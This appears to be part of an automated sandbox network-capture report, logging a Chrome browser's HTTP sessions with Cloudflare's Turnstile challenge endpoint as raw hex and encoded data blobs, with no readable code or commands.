                                                                                                    2025-01-14 17:38:04 UTC1047INData Raw: 64 35 75 63 6f 70 58 42 68 62 61 46 74 73 6a 41 68 38 57 35 6a 49 4f 64 68 62 54 45 70 59 6d 34 79 4b 71 55 72 64 47 75 7a 70 6a 4c 79 38 48 44 6e 39 37 64 36 4d 57 69 75 4f 4c 57 7a 4d 2f 48 38 4d 4b 39 73 61 66 6a 77 72 66 44 39 38 36 35 75 2f 7a 79 31 65 48 63 35 4e 76 33 31 64 44 41 39 4f 41 4a 41 75 58 38 2f 63 4c 37 7a 41 4d 55 42 78 48 31 43 74 63 53 42 2b 33 36 36 52 76 35 38 53 4c 6a 45 66 48 30 41 76 41 64 35 52 67 6c 47 65 34 64 48 50 45 30 46 41 73 79 4d 54 6a 32 38 76 6b 48 43 54 38 54 4b 41 41 2b 2f 44 41 68 2f 68 6e 2b 2b 69 6f 45 4a 55 55 64 4e 7a 74 4f 4a 79 34 31 4a 55 4a 4e 4e 55 68 54 4f 78 49 6c 4f 44 6f 37 56 43 78 42 54 6b 31 47 58 7a 70 65 59 6d 4e 4b 58 32 55 6f 49 6d 70 72 52 46 31 51 64 33 5a 79 61 55 35 70 65 58 31 77 56 46 78
                                                                                                    Data Ascii: d5ucopXBhbaFtsjAh8W5jIOdhbTEpYm4yKqUrdGuzpjLy8HDn97d6MWiuOLWzM/H8MK9safjwrfD9865u/zy1eHc5Nv31dDA9OAJAuX8/cL7zAMUBxH1CtcSB+366Rv58SLjEfH0AvAd5RglGe4dHPE0FAsyMTj28vkHCT8TKAA+/DAh/hn++ioEJUUdNztOJy41JUJNNUhTOxIlODo7VCxBTk1GXzpeYmNKX2UoImprRF1Qd3ZyaU5peX1wVFx
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 50 6f 35 50 43 7a 37 44 55 74 72 36 71 6e 4a 36 65 7a 73 48 58 76 63 58 57 34 4e 54 4b 31 2b 44 64 71 2b 50 41 72 64 50 66 72 73 4f 79 36 37 54 57 34 75 66 4c 38 38 79 34 7a 39 50 37 31 64 6a 46 30 65 54 6c 31 67 77 49 43 41 77 4d 36 41 58 64 38 41 6a 4c 43 77 4c 32 34 65 2f 53 39 42 44 6f 2b 68 6f 41 45 67 38 6c 33 66 73 6f 48 52 73 6a 49 41 41 41 41 53 49 75 48 7a 50 78 41 77 6f 4e 4e 76 55 45 42 42 55 75 2f 44 38 76 47 68 49 59 51 68 31 41 50 55 45 30 50 44 6f 6b 54 55 35 4d 42 78 77 49 50 79 51 69 49 78 52 54 4b 46 51 7a 4e 68 5a 56 55 43 64 5a 4e 78 78 57 49 6c 41 65 4d 52 34 6d 5a 45 42 74 51 55 6c 6c 62 57 64 50 4b 6e 51 2f 62 55 52 58 4d 32 56 37 63 6c 31 70 65 6e 31 4c 55 32 74 58 68 58 6c 57 58 31 5a 38 57 6f 6d 46 59 48 6d 50 57 59 68 4c 62 48
                                                                                                    Data Ascii: Po5PCz7DUtr6qnJ6ezsHXvcXW4NTK1+Ddq+PArdPfrsOy67TW4ufL88y4z9P71djF0eTl1gwICAwM6AXd8AjLCwL24e/S9BDo+hoAEg8l3fsoHRsjIAAAASIuHzPxAwoNNvUEBBUu/D8vGhIYQh1APUE0PDokTU5MBxwIPyQiIxRTKFQzNhZVUCdZNxxWIlAeMR4mZEBtQUllbWdPKnQ/bURXM2V7cl1pen1LU2tXhXlWX1Z8WomFYHmPWYhLbH
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 6c 49 2b 35 76 72 43 54 6d 62 79 61 31 38 37 46 78 4b 6d 35 77 37 66 42 79 75 32 38 71 63 33 48 39 66 61 75 32 4d 58 74 79 4f 6e 7a 35 66 72 35 38 62 7a 71 2f 75 37 64 33 66 48 54 31 50 66 7a 35 73 62 36 41 51 55 44 2f 41 44 6a 79 2b 4c 55 32 4e 45 5a 31 4f 34 48 2b 43 41 59 44 41 76 74 42 64 63 6a 39 69 6a 34 2f 75 51 48 2b 43 30 6f 35 2b 4d 71 42 43 66 77 37 43 49 78 38 52 77 54 4a 69 73 53 45 7a 73 31 48 52 63 38 39 79 45 67 4a 69 63 63 4a 79 77 2f 4a 43 77 62 53 79 6f 6d 50 52 41 75 56 54 41 69 52 43 52 65 4d 68 67 5a 59 6c 78 67 58 57 59 33 4f 47 46 46 59 7a 74 6c 62 43 6c 4a 62 79 64 67 58 55 4d 31 50 6d 4a 77 52 58 70 7a 54 58 35 66 53 56 31 4f 58 6e 78 64 66 31 5a 34 56 6d 4a 71 56 6d 64 6e 65 57 4a 6e 63 46 75 4c 6c 59 79 4e 53 59 4f 59 63 58 64
                                                                                                    Data Ascii: lI+5vrCTmbya187FxKm5w7fByu28qc3H9fau2MXtyOnz5fr58bzq/u7d3fHT1Pfz5sb6AQUD/ADjy+LU2NEZ1O4H+CAYDAvtBdcj9ij4/uQH+C0o5+MqBCfw7CIx8RwTJisSEzs1HRc89yEgJiccJyw/JCwbSyomPRAuVTAiRCReMhgZYlxgXWY3OGFFYztlbClJbydgXUM1PmJwRXpzTX5fSV1OXnxdf1Z4VmJqVmdneWJncFuLlYyNSYOYcXd
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 4e 58 58 33 37 50 65 30 71 65 6c 74 71 69 2b 75 65 71 37 7a 4f 6e 4b 33 75 2f 50 30 4f 47 34 34 75 54 53 78 65 79 33 38 75 44 73 34 41 50 4f 30 76 61 2f 39 51 66 30 31 50 62 6c 34 66 7a 77 46 4f 55 43 42 77 45 57 37 76 54 71 30 66 49 63 39 4e 45 53 39 50 37 77 35 43 50 63 32 64 6f 6e 4b 43 7a 31 47 78 63 44 36 53 30 45 4c 6a 55 76 4d 51 34 44 4d 65 77 58 48 54 44 37 45 68 50 7a 48 44 51 62 52 69 49 53 4a 53 63 30 49 44 38 36 4b 43 51 6a 44 6c 4e 52 4b 45 59 34 45 56 49 6c 55 6b 56 51 4a 7a 56 62 54 7a 41 73 48 47 49 75 52 44 78 43 50 6a 68 4d 5a 69 42 72 59 53 6f 38 59 32 31 44 54 47 5a 79 4d 6b 52 72 63 30 74 55 62 6e 67 36 54 48 4e 35 55 31 78 32 66 6f 4f 4c 5a 58 68 66 58 58 31 64 68 34 70 53 6c 49 75 46 58 34 71 54 64 4a 61 51 63 31 71 67 6c 6d 36 4c
                                                                                                    Data Ascii: NXX37Pe0qeltqi+ueq7zOnK3u/P0OG44uTSxey38uDs4APO0va/9Qf01Pbl4fzwFOUCBwEW7vTq0fIc9NES9P7w5CPc2donKCz1GxcD6S0ELjUvMQ4DMewXHTD7EhPzHDQbRiISJSc0ID86KCQjDlNRKEY4EVIlUkVQJzVbTzAsHGIuRDxCPjhMZiBrYSo8Y21DTGZyMkRrc0tUbng6THN5U1x2foOLZXhfXX1dh4pSlIuFX4qTdJaQc1qglm6L
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 4c 6f 33 64 75 37 70 39 7a 44 78 4e 44 6c 72 75 33 78 34 4f 66 6a 75 65 57 79 2f 4c 37 33 7a 4d 2f 75 37 76 7a 38 41 2f 7a 2b 32 67 66 37 42 67 58 41 43 67 6b 50 38 2b 72 52 46 65 6e 6d 43 77 59 4c 2b 76 6e 56 44 67 37 36 33 67 44 35 46 2f 72 32 4a 66 58 70 42 53 76 6a 47 68 38 4b 36 6a 44 6f 42 53 33 75 2f 76 55 35 47 78 67 6b 45 50 55 38 43 53 77 57 49 76 73 43 39 2f 67 46 42 6b 51 70 4f 41 73 39 54 7a 6b 70 48 55 4a 47 4c 41 38 77 54 44 46 4e 45 79 55 37 55 44 51 78 51 43 30 77 57 54 39 43 57 6b 4d 39 49 6c 34 33 54 47 41 33 4b 6b 74 50 55 46 42 50 56 45 78 58 57 6c 56 32 61 46 35 76 61 6c 74 56 58 6b 75 45 57 57 4e 6f 64 57 5a 44 58 47 31 74 57 56 64 43 63 47 39 6f 58 6d 79 48 62 48 64 77 5a 6f 5a 34 65 57 74 6f 61 48 36 6a 6f 70 5a 37 67 33 69 53 69
                                                                                                    Data Ascii: Lo3du7p9zDxNDlru3x4OfjueWy/L73zM/u7vz8A/z+2gf7BgXACgkP8+rRFenmCwYL+vnVDg763gD5F/r2JfXpBSvjGh8K6jDoBS3u/vU5GxgkEPU8CSwWIvsC9/gFBkQpOAs9TzkpHUJGLA8wTDFNEyU7UDQxQC0wWT9CWkM9Il43TGA3KktPUFBPVExXWlV2aF5valtVXkuEWWNodWZDXG1tWVdCcG9oXmyHbHdwZoZ4eWtoaH6jopZ7g3iSi
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 62 30 4f 32 76 38 4b 2f 75 39 75 6e 75 36 39 6e 31 75 39 33 54 41 65 76 55 31 41 50 75 35 64 6b 4a 33 2f 50 65 44 4f 44 74 42 42 45 4c 79 4e 73 46 30 78 50 72 42 76 6b 57 30 67 6a 38 37 39 6b 64 33 50 44 73 45 41 58 37 4a 52 58 6a 48 2b 6b 5a 4a 2f 77 47 48 51 63 62 4d 54 41 67 4f 41 6b 33 4d 44 41 46 4f 43 67 34 45 50 77 38 51 42 42 41 4d 6a 41 61 52 67 6b 56 48 7a 67 64 54 67 68 42 4d 55 35 55 55 42 52 53 46 45 55 35 4b 53 31 47 47 43 6b 30 54 6b 4a 66 59 31 5a 62 57 45 5a 69 4b 45 70 41 62 56 68 42 51 57 39 62 55 6b 5a 31 54 47 42 4c 65 45 31 61 63 48 31 33 4e 55 68 78 51 48 35 41 63 57 56 67 51 48 6c 70 57 45 71 49 53 47 78 49 65 6b 32 54 59 34 39 32 55 31 4e 52 6b 6b 31 55 6e 6e 4b 55 61 70 47 4d 63 56 79 6c 6f 4a 69 63 71 57 6d 46 5a 47 6d 6f 70 32
                                                                                                    Data Ascii: b0O2v8K/u9unu69n1u93TAevU1APu5dkJ3/PeDODtBBELyNsF0xPrBvkW0gj879kd3PDsEAX7JRXjH+kZJ/wGHQcbMTAgOAk3MDAFOCg4EPw8QBBAMjAaRgkVHzgdTghBMU5UUBRSFEU5KS1GGCk0TkJfY1ZbWEZiKEpAbVhBQW9bUkZ1TGBLeE1acH13NUhxQH5AcWVgQHlpWEqISGxIek2TY492U1NRkk1UnnKUapGMcVyloJicqWmFZGmop2
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 39 65 4c 75 32 2f 76 6e 33 65 6d 32 36 2f 59 43 41 2b 2f 55 41 72 2f 7a 36 41 72 43 2b 38 66 6e 44 2f 33 67 32 38 6f 42 7a 2f 63 59 41 39 50 77 36 67 6a 73 48 74 30 4c 41 65 38 6a 45 50 54 37 4a 68 54 35 46 75 4d 59 2f 41 41 77 47 2b 73 51 4d 79 41 72 41 44 6b 6f 38 78 67 35 4a 77 30 4d 2f 69 73 52 45 45 55 77 4f 78 6b 58 4e 43 6b 63 42 54 63 48 44 77 34 37 49 56 49 4d 51 43 5a 43 45 45 55 55 4f 46 31 49 55 7a 51 59 53 68 77 38 47 31 51 67 53 43 42 54 4f 57 70 73 57 47 4e 45 4c 6c 73 73 53 55 4e 67 61 31 68 31 59 30 6c 4d 65 32 59 34 55 49 42 73 55 6d 34 39 62 31 56 67 68 33 4e 45 57 49 70 35 53 47 69 51 67 45 78 30 6b 33 39 51 62 46 47 44 61 58 68 61 68 31 64 52 62 34 70 63 65 47 4f 4f 59 48 43 6f 6c 48 6d 71 72 5a 70 2b 6d 6d 69 62 70 33 79 78 6f 4a 57
                                                                                                    Data Ascii: 9eLu2/vn3em26/YCA+/UAr/z6ArC+8fnD/3g28oBz/cYA9Pw6gjsHt0LAe8jEPT7JhT5FuMY/AAwG+sQMyArADko8xg5Jw0M/isREEUwOxkXNCkcBTcHDw47IVIMQCZCEEUUOF1IUzQYShw8G1QgSCBTOWpsWGNELlssSUNga1h1Y0lMe2Y4UIBsUm49b1Vgh3NEWIp5SGiQgEx0k39QbFGDaXhah1dRb4pceGOOYHColHmqrZp+mmibp3yxoJW
                                                                                                    2025-01-14 17:38:04 UTC1369INData Raw: 2f 50 37 37 75 33 7a 35 4d 44 41 31 51 54 35 32 66 66 2b 78 67 72 64 37 77 4c 68 41 41 48 4f 45 75 58 33 43 75 6b 49 45 77 6e 7a 38 4f 37 64 41 52 50 63 46 64 63 62 39 68 51 4b 4c 41 30 6f 4a 43 77 6e 49 4f 73 4d 37 43 59 4c 4b 2f 41 70 36 79 38 4c 4b 42 30 64 46 44 41 43 47 50 35 41 4a 6b 51 2f 4f 50 74 48 46 51 73 6a 51 79 4d 50 49 69 4a 45 44 6b 49 70 49 52 59 56 57 7a 42 4d 45 46 49 62 48 6a 4a 51 57 6c 45 38 55 7a 63 6c 4a 46 78 6f 58 43 41 72 4b 32 78 53 63 47 39 6b 4b 47 39 4d 61 43 77 7a 4e 7a 74 4f 62 48 70 74 57 48 39 54 51 6b 42 34 65 48 67 38 58 45 65 49 62 6f 79 49 67 46 4a 70 61 4a 46 73 67 49 53 44 57 6f 70 58 6d 48 36 63 6b 4a 42 55 6a 4a 43 50 5a 70 64 38 6d 46 79 55 6d 4a 69 44 6e 6d 75 73 6b 72 43 74 70 47 69 67 70 4b 53 50 71 35 43 73
                                                                                                    Data Ascii: /P77u3z5MDA1QT52ff+xgrd7wLhAAHOEuX3CukIEwnz8O7dARPcFdcb9hQKLA0oJCwnIOsM7CYLK/Ap6y8LKB0dFDACGP5AJkQ/OPtHFQsjQyMPIiJEDkIpIRYVWzBMEFIbHjJQWlE8UzclJFxoXCArK2xScG9kKG9MaCwzNztObHptWH9TQkB4eHg8XEeIboyIgFJpaJFsgISDWopXmH6ckJBUjJCPZpd8mFyUmJiDnmuskrCtpGigpKSPq5Cs


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.563876104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:05 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:05 UTC442INHTTP/1.1 400 Bad Request
                                                                                                    Date: Tue, 14 Jan 2025 17:38:05 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 14
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    cf-chl-out: beRKn7IRoGt9clPpwbWk5KQNxwly0b3knH0phyFYJqt19qKt4cO0KlRgesB0U7mIvlQFtotQ+2OGoQaet01sQQ==$LiDPf8vjQsU9J2hEFUbSDQ==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65ce0ed718f6-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:05 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                    Data Ascii: {"err":100230}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    37192.168.2.563877104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:13 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 34835
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:13 UTC16384OUTData Raw: 76 5f 39 30 31 66 36 35 61 38 62 38 39 34 34 33 62 31 3d 4a 39 56 4f 55 47 6b 37 6c 70 39 41 39 41 65 39 6b 6e 6b 70 75 31 62 37 6b 38 6b 2d 6a 41 30 4f 70 6d 66 43 41 31 4f 6b 4c 6f 6b 4c 2d 41 34 41 45 39 66 47 70 41 62 41 50 56 66 48 56 41 4a 47 41 47 6d 6b 34 41 63 56 6e 41 71 4f 6b 6d 70 41 30 67 47 2d 70 59 74 4f 41 52 41 66 67 47 63 42 66 56 6c 6b 52 6d 4f 4d 6d 6f 53 6e 43 4d 41 47 37 42 50 4f 6e 38 41 6f 4f 66 6f 41 38 74 70 4b 39 35 41 4d 31 47 48 41 63 33 4e 44 6c 56 41 41 53 31 41 4a 6c 4f 41 66 5a 57 78 4f 66 2d 43 4f 41 7a 4b 44 5a 68 78 42 56 6e 78 46 4e 61 38 49 4d 46 57 73 43 57 74 44 6e 53 43 6c 6c 67 73 41 43 47 6c 5a 6e 56 4b 78 41 41 24 44 4d 57 47 63 53 76 68 55 47 57 24 59 72 45 44 68 75 41 2d 74 7a 54 38 74 25 32 62 4a 72 5a 54 45
                                                                                                    Data Ascii: v_901f65a8b89443b1=J9VOUGk7lp9A9Ae9knkpu1b7k8k-jA0OpmfCA1OkLokL-A4AE9fGpAbAPVfHVAJGAGmk4AcVnAqOkmpA0gG-pYtOARAfgGcBfVlkRmOMmoSnCMAG7BPOn8AoOfoA8tpK95AM1GHAc3NDlVAAS1AJlOAfZWxOf-COAzKDZhxBVnxFNa8IMFWsCWtDnSCllgsACGlZnVKxAA$DMWGcSvhUGW$YrEDhuA-tzT8t%2bJrZTE
                                                                                                    2025-01-14 17:38:13 UTC16384OUTData Raw: 2d 75 24 41 66 37 6e 65 41 6d 4f 41 41 79 78 67 66 6e 41 62 41 6d 4f 67 37 6a 6e 4a 32 47 4f 41 4e 79 48 65 24 76 41 33 6f 6e 61 4b 57 56 38 4f 6b 77 32 49 35 56 41 69 39 47 67 41 4b 41 47 4f 47 35 41 7a 41 62 55 6b 70 41 2b 4f 50 6d 66 36 4f 54 41 4c 67 41 6f 41 44 65 50 31 66 39 41 73 48 63 67 6b 6f 67 41 65 4c 56 47 43 41 70 4f 50 6c 4b 6d 41 48 4f 6b 6c 6b 5a 41 49 41 69 6c 41 4d 41 73 4f 45 41 47 70 31 71 4f 62 6d 47 63 41 75 41 47 39 47 2d 7a 78 4f 4a 56 47 56 35 6d 41 75 64 48 57 41 49 41 41 41 6b 5a 24 78 4a 6c 6b 46 4f 6f 41 63 41 6e 51 41 49 41 45 34 41 54 67 6a 70 4c 39 47 37 6b 6e 41 64 77 76 6d 41 54 4f 66 59 66 6f 31 67 4f 64 67 6e 46 48 4c 7a 56 57 66 6b 67 4f 4f 37 69 6b 24 67 49 41 46 6e 6b 76 41 6b 37 70 6d 41 5a 6b 43 4f 68 39 47 2b 41
                                                                                                    Data Ascii: -u$Af7neAmOAAyxgfnAbAmOg7jnJ2GOANyHe$vA3onaKWV8Okw2I5VAi9GgAKAGOG5AzAbUkpA+OPmf6OTALgAoADeP1f9AsHcgkogAeLVGCApOPlKmAHOklkZAIAilAMAsOEAGp1qObmGcAuAG9G-zxOJVGV5mAudHWAIAAAkZ$xJlkFOoAcAnQAIAE4ATgjpL9G7knAdwvmATOfYfo1gOdgnFHLzVWfkgOO7ik$gIAFnkvAk7pmAZkCOh9G+A
                                                                                                    2025-01-14 17:38:13 UTC2067OUTData Raw: 6c 4c 67 47 57 41 37 6c 63 39 41 6d 59 62 6f 71 57 37 53 41 49 4d 4b 63 52 78 31 64 41 69 38 47 48 41 6c 6a 7a 6a 49 4f 4a 42 43 66 50 66 4e 24 76 4e 66 46 72 45 73 67 2b 76 39 47 33 51 44 65 69 61 75 4a 73 77 6f 4d 36 52 45 24 4b 46 59 6c 70 66 41 67 6c 62 41 6b 6f 67 2b 4f 46 37 38 4c 62 59 74 46 6e 41 68 38 37 73 2b 56 66 43 41 45 41 4a 4f 6b 48 41 45 41 6e 66 78 55 4e 4c 6e 47 43 41 61 32 37 6c 62 4c 47 68 67 76 39 30 6e 55 42 6a 65 42 47 74 55 7a 6a 4e 57 34 38 41 38 32 52 59 6a 46 2b 6d 41 6f 61 42 75 69 57 24 44 51 30 73 33 71 6a 36 4f 4d 41 41 56 41 4a 53 59 31 66 43 41 47 41 47 6e 2d 6d 41 67 43 4a 56 47 31 6a 2d 7a 35 39 59 46 37 77 6a 64 4f 66 47 41 71 67 47 6e 4d 47 59 4b 49 59 55 56 62 73 72 46 7a 41 6b 37 41 37 6c 6e 74 54 44 72 30 50 73 6d
                                                                                                    Data Ascii: lLgGWA7lc9AmYboqW7SAIMKcRx1dAi8GHAljzjIOJBCfPfN$vNfFrEsg+v9G3QDeiauJswoM6RE$KFYlpfAglbAkog+OF78LbYtFnAh87s+VfCAEAJOkHAEAnfxUNLnGCAa27lbLGhgv90nUBjeBGtUzjNW48A82RYjF+mAoaBuiW$DQ0s3qj6OMAAVAJSY1fCAGAGn-mAgCJVG1j-z59YF7wjdOfGAqgGnMGYKIYUVbsrFzAk7A7lntTDr0Psm
                                                                                                    2025-01-14 17:38:14 UTC1357INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 4624
                                                                                                    Connection: close
                                                                                                    cf-chl-out: m+94uOPAG+2px8/BID8x6CXN1Un72/BhX69jee8D2jNparPFKTOnfJUbmzLz5/cJ3sClB6CMHKwzUFK87UO1MwScjx6Ah2XkY+li/MTNgCE=$Wfkpc5mqsz8DlBhHi9NBiQ==
                                                                                                    cf-chl-out-s: X2CkvmMZ0isInilaROLAvg7xFHBA0ircYb6F+DuTEBMKCJov4EAVCHRAEOUuTJvC3K8gCL0u6VPg1RTBcA57pzhAYytX25M/AUgysjw9HSM7QX1QyRiE4PtKd9Vgz7k8b76fsoD1iagtdwEU+7vGyv26k4RO97dwlF8S0evFfle9KYAt60NrCvskt83s3Ak4VNH4xahuEAJ5uWm6YVqfCXCf8WkyknjRzRc/F3g+nv8xeGjgzUkXE3586LCiDxzXkJWfsgvABkCd6SCjLS0NJJn5OlVV3yDX9hjRPEF2yVPMIYPr+YwgT33Spg+HotHyzr8DHAwsNSEa57/CDaFHb4x6mTnM1CKGyVtceCutWwwScz39EFH6/3V+/NpMhSVYGUoe91sXZ9D77I4tnj3Gne5MAlCnU+yBMRT0zkgn9IlYLqubgYE5XPNKySWpjBxOFTf7lStsk4aYI8ofMeS3pATJtYpEW3yXCeaDZhPBSdBkFWFnYmAf/Tg0PZXckD0Z+MolW1P6qUxuAC4T2FbGz3d133QIMinuUzJgivrIis0/M6x3Gj7i7s04M1oOCj77g3iYECsLgGS7HL77M52PuzdgT3c2iperv4YO4tzEQ/5MlMaeqlXGGKCPUI8wSW1yUTq+s4wl6PWDK7o49yqK/hY9G0iGgSfn7YRzevIMNlhTL5lMGr545PCNODQchqzmM09mOFyD5txLYKTSVMibMb+2CGnUXOb3PKdlMKjmV2VAecEmr/Fos6zHpXlvbvKKU2AkSLJ6uRKl0hsxIkO3U7ilL/kfjfiFEJ3I378fErF0MBfk5Mg/yIoUpYvozmB4bx7e5zxU9K+PPGEubB2wr9tjmIn8QgrzE7qC7gOy9q7y473fketLXdjgjZlkHqFNslo3BF2ysWiGADBuai3yhcLwIX+WXzjBQ/2T32fMjiQ3qRkNtD+gR+/hf2T3geijnLqot+9h1HCBQHR1ZWXTwQ==$UyFRlH55SwVXELhu0b3gWg==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f66052853420a-EWR
                                                                                                    2025-01-14 17:38:14 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                    Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:14 UTC1349INData Raw: 64 35 75 63 6f 70 58 42 68 62 61 46 74 73 6a 41 68 38 57 35 6a 49 4f 65 30 6f 7a 45 79 36 32 69 79 4a 53 70 6c 4e 43 65 6e 4e 69 38 31 63 43 78 78 72 48 44 78 62 53 70 78 62 54 6f 37 72 71 76 73 66 4b 2b 73 37 58 6a 77 2b 61 34 77 72 4c 4e 32 4e 7a 4c 39 4f 44 55 77 4e 7a 35 77 73 54 79 41 73 54 56 39 63 6e 46 33 2b 44 6f 38 75 44 50 41 2b 58 6f 30 68 6b 44 38 68 6b 53 45 2f 41 4e 41 2f 44 77 2f 67 50 76 35 78 58 31 2b 42 77 58 4a 69 59 6a 37 43 6b 72 42 69 30 73 43 44 41 61 38 79 67 6d 39 51 6b 6f 4c 51 38 2b 50 45 45 33 52 78 70 41 42 6b 6f 66 43 69 45 35 43 79 73 78 53 7a 46 54 52 43 39 4a 53 6a 4a 58 55 55 6c 65 57 46 63 38 55 30 38 79 55 42 39 68 53 46 6f 79 48 46 74 46 54 55 73 74 5a 55 63 71 4c 45 70 6c 54 58 56 45 64 30 4e 6d 4d 6d 6f 36 61 58 64
                                                                                                    Data Ascii: d5ucopXBhbaFtsjAh8W5jIOe0ozEy62iyJSplNCenNi81cCxxrHDxbSpxbTo7rqvsfK+s7Xjw+a4wrLN2NzL9ODUwNz5wsTyAsTV9cnF3+Do8uDPA+Xo0hkD8hkSE/ANA/Dw/gPv5xX1+BwXJiYj7CkrBi0sCDAa8ygm9QkoLQ8+PEE3RxpABkofCiE5CysxSzFTRC9JSjJXUUleWFc8U08yUB9hSFoyHFtFTUstZUcqLEplTXVEd0NmMmo6aXd
                                                                                                    2025-01-14 17:38:14 UTC1369INData Raw: 36 39 33 6c 71 2b 36 70 37 53 30 74 72 75 30 6e 4c 2b 45 78 4c 48 47 74 4d 43 34 78 34 36 4a 75 59 6e 4c 69 63 54 4e 7a 38 69 6d 7a 36 37 51 79 74 36 63 74 73 76 66 6f 62 72 50 6e 72 75 64 34 4b 4b 2b 74 61 6a 6e 77 75 54 64 37 75 7a 6e 35 62 47 30 38 2b 53 79 75 4c 6a 74 2f 4e 4c 34 39 2f 6a 39 77 65 2f 38 32 76 7a 69 78 41 62 6d 34 4d 58 4e 33 75 45 4d 44 51 6e 76 46 4e 55 45 31 67 38 54 2b 64 66 58 47 50 55 66 47 51 7a 68 45 42 34 53 49 52 49 70 46 53 51 72 4a 41 45 4c 41 43 2f 76 2f 69 48 79 4d 41 38 78 4e 67 30 62 46 7a 67 34 43 6a 2f 35 50 7a 41 7a 51 68 72 39 4d 55 68 47 48 67 73 4a 4f 41 49 4b 54 30 6f 4b 49 6c 56 53 4b 79 49 58 52 56 46 4e 58 7a 45 75 57 52 74 65 49 56 55 69 4a 6b 63 33 49 6c 52 48 58 69 56 45 58 54 74 74 4d 32 46 47 64 53 6c 74
                                                                                                    Data Ascii: 693lq+6p7S0tru0nL+ExLHGtMC4x46JuYnLicTNz8imz67Qyt6ctsvfobrPnrud4KK+tajnwuTd7uzn5bG08+SyuLjt/NL49/j9we/82vzixAbm4MXN3uEMDQnvFNUE1g8T+dfXGPUfGQzhEB4SIRIpFSQrJAELAC/v/iHyMA8xNg0bFzg4Cj/5PzAzQhr9MUhGHgsJOAIKT0oKIlVSKyIXRVFNXzEuWRteIVUiJkc3IlRHXiVEXTttM2FGdSlt
